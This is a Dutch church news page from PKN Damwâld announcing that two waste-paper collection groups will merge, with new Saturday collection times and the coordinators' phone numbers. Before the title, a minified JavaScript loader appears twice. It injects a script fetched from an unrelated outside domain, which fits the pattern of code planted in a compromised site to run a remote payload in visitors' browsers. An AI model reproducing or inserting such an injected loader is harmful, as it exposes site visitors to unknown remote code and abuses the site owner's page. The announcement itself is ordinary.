;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Eén inzamelgroep oud papier! - PKN Damwâld

Eén inzamelgroep oud papier!

Gepubliceerd op: zaterdag 7 januari 2023

Zoals u in de Paadwizer heeft gelezen en op de laatste gemeentevergadering is uitgelegd, gaan de beide oudpapier-organisaties per 1 januari verder als één inzamelgroep. De afgelopen jaren hebben beide kerken een verschillend systeem gehanteerd. We hebben de systemen naast elkaar gelegd en op basis van “praktische haalbaarheid” besloten om zoveel mogelijk op zaterdagmorgen tussen 8.00 en 12.00 uur in te zamelen. Dit vindt plaats op elke laatste zaterdag van de maand.

Alle ophaalroutes zijn opnieuw ingedeeld. Omdat niet alle inzamelaars op zaterdagmorgen kunnen, zullen een aantal routes door de week plaats vinden. Dit is dan de week voorafgaande aan de inzamel-zaterdag. Het kan dus voor uw straat betekenen dat het ophaalmoment veranderd. Behoort u tot één van de straten waar het inzamelmoment door de week zal plaats vinden, dan krijgt u een aparte inzamelbrief met ophaaldag van uw inzamelaar.

De oudpapier containers komen op het parkeerterrein tegen over de Bonifatiuskerk te staan. Op zaterdagmorgen kunt u ook tussen 8.30 en 12.00 uur persoonlijk het oud papier daar brengen. Eind januari wordt de nieuwe werkwijze voor het eerst toegepast.

Mocht u vragen hebben dan kunt u terecht bij de coördinatoren: Jan: 06-2025 0407, Leo: 06-1251 8439 en Douwe: 06-2221 1430.